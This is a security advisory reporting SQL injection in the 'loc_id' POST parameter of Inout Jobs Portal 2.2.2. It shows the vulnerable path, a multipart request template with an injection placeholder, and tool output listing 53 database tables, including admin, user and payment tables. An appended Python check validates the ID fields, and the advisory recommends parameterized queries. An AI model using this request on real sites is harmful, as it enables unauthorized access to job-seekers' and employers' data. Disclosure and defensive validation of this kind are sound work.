C r a C k E r
T H E   C R A C K   O F   E T E R N A L   M I G H T

From The Ashes and Dust Rises An Unimaginable crack....

[ Vulnerability ]

Author    : CraCkEr
Website   : inoutscripts.com
Vendor    : Inout Scripts - Nesote Technologies Private Limited
Software  : Inout Jobs Portal 2.2.2
Vuln Type : SQL Injection
Impact    : Database Access

Release Notes:
═════════════

SQL injection attacks can allow unauthorized access to sensitive data and
modification of data, and can crash the application or make it unavailable,
leading to lost revenue and damage to a company's reputation.

Greets: The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL

CryptoJob (Twitter) twitter.com/CryptozJob

© CraCkEr 2023

Path: /index.php?page=jobs/searchresult

Method: POST

POST parameter 'loc_id' is vulnerable to SQLI

+-----------------------------------------------------------+
-----------------------------245625052541747605171577107419
Content-Disposition: form-data; name="search_query"

web
-----------------------------245625052541747605171577107419
Content-Disposition: form-data; name="c_id"

1
-----------------------------245625052541747605171577107419
Content-Disposition: form-data; name="loc_id"

1[INJECT-HERE]
-----------------------------245625052541747605171577107419
Content-Disposition: form-data; name="serchtype"

simple
-----------------------------245625052541747605171577107419
Content-Disposition: form-data; name="c_id"

0
-----------------------------245625052541747605171577107419
+-----------------------------------------------------------+

[INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.6

[INFO] fetching tables for database: '*****_jobs_portal'

Database: *****_jobs_portal
[53 tables]
+-----------------------------------------+
| nesote_inoutscripts_company_ratereview  |
| nesote_inoutscripts_homepage_banner     |
| nesote_inoutscripts_users               |
| nesote_jobportal_admin                  |
| nesote_jobportal_applied_jobs           |
| nesote_jobportal_city                   |
| nesote_jobportal_client_logs            |
| nesote_jobportal_company_size           |
| nesote_jobportal_company_type           |
| nesote_jobportal_companyblock           |
| nesote_jobportal_contents               |
| nesote_jobportal_country                |
| nesote_jobportal_coverletters           |
| nesote_jobportal_currency               |
| nesote_jobportal_email_templates        |
| nesote_jobportal_employer_details       |
| nesote_jobportal_employer_feedback      |
| nesote_jobportal_functional_role        |
| nesote_jobportal_industry               |
| nesote_jobportal_ip_012023              |
| nesote_jobportal_ip_022020              |
| nesote_jobportal_ip_032020              |
| nesote_jobportal_ip_042020              |
| nesote_jobportal_ip_082021              |
| nesote_jobportal_ip_092022              |
| nesote_jobportal_ip_102022              |
| nesote_jobportal_ip_112022              |
| nesote_jobportal_ip_122022              |
| nesote_jobportal_ipn                    |
| nesote_jobportal_job_types              |
| nesote_jobportal_jobs                   |
| nesote_jobportal_jobseeker_details      |
| nesote_jobportal_languages              |
| nesote_jobportal_locations              |
| nesote_jobportal_messages               |
| nesote_jobportal_months_messages        |
| nesote_jobportal_news_and_events        |
| nesote_jobportal_notifications          |
| nesote_jobportal_packages               |
| nesote_jobportal_payment_details        |
| nesote_jobportal_previous_exp           |
| nesote_jobportal_qualifications         |
| nesote_jobportal_resumes                |
| nesote_jobportal_saved_jobs             |
| nesote_jobportal_saved_resumes          |
| nesote_jobportal_seekers_qualifications |
| nesote_jobportal_sent_jobalerts         |
| nesote_jobportal_settings               |
| nesote_jobportal_skills                 |
| nesote_jobportal_specifications         |
| nesote_jobportal_states                 |
| nesote_jobportal_success_story          |
| nesote_jobportal_themes                 |
+-----------------------------------------+

[-] Done
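
Added example (not part of the original advisory, and not the vendor's code): a Python check that parses a multipart/form-data body shaped like the request above and rejects non-integer values in the ID fields c_id and loc_id. It assumes those fields are meant to be plain integers; the function names, the boundary string and the sample bodies are constructed for illustration.

```python
import re

# Assumption: the search form's ID fields carry plain non-negative integers.
NUMERIC_FIELDS = {"c_id", "loc_id"}
INT_RE = re.compile(r"[0-9]{1,10}")
NAME_RE = re.compile(r'Content-Disposition:\s*form-data;\s*name="([^"]*)"', re.I)

def parse_multipart(body, boundary):
    """Return (name, value) pairs in request order, keeping duplicate names."""
    pairs = []
    for chunk in body.split("--" + boundary):
        chunk = chunk.strip("\r\n")
        if not chunk or chunk == "--":      # preamble or closing delimiter
            continue
        headers, _, value = chunk.partition("\r\n\r\n")
        match = NAME_RE.search(headers)
        if match:
            pairs.append((match.group(1), value))
    return pairs

def rejected_fields(body, boundary):
    """List every numeric-field occurrence whose value is not an integer.

    Every occurrence is checked, not just the first: the request in the
    advisory sends c_id twice, and PHP keeps the last value of a repeated name.
    """
    return [(n, v) for n, v in parse_multipart(body, boundary)
            if n in NUMERIC_FIELDS and not INT_RE.fullmatch(v)]

def build_body(fields, boundary):
    """Construct a multipart/form-data body (used for the sample requests)."""
    parts = [f'--{boundary}\r\nContent-Disposition: form-data; name="{n}"\r\n\r\n{v}\r\n'
             for n, v in fields]
    return "".join(parts) + f"--{boundary}--\r\n"

# Constructed boundary in the browser style seen in the advisory.
BOUNDARY = "-" * 27 + "245625052541747605171577107419"
# Constructed samples: the field layout from the advisory, once with benign
# values and once with the advisory's own placeholder in loc_id.
BENIGN = build_body([("search_query", "web"), ("c_id", "1"), ("loc_id", "1"),
                     ("serchtype", "simple"), ("c_id", "0")], BOUNDARY)
FLAGGED = build_body([("search_query", "web"), ("c_id", "1"),
                      ("loc_id", "1[INJECT-HERE]"), ("serchtype", "simple"),
                      ("c_id", "0")], BOUNDARY)

if __name__ == "__main__":
    print(rejected_fields(BENIGN, BOUNDARY))
    print(rejected_fields(FLAGGED, BOUNDARY))
```

A check like this only guards the entry point; the fix in the application is to bind loc_id as a query parameter instead of concatenating it into the SQL string.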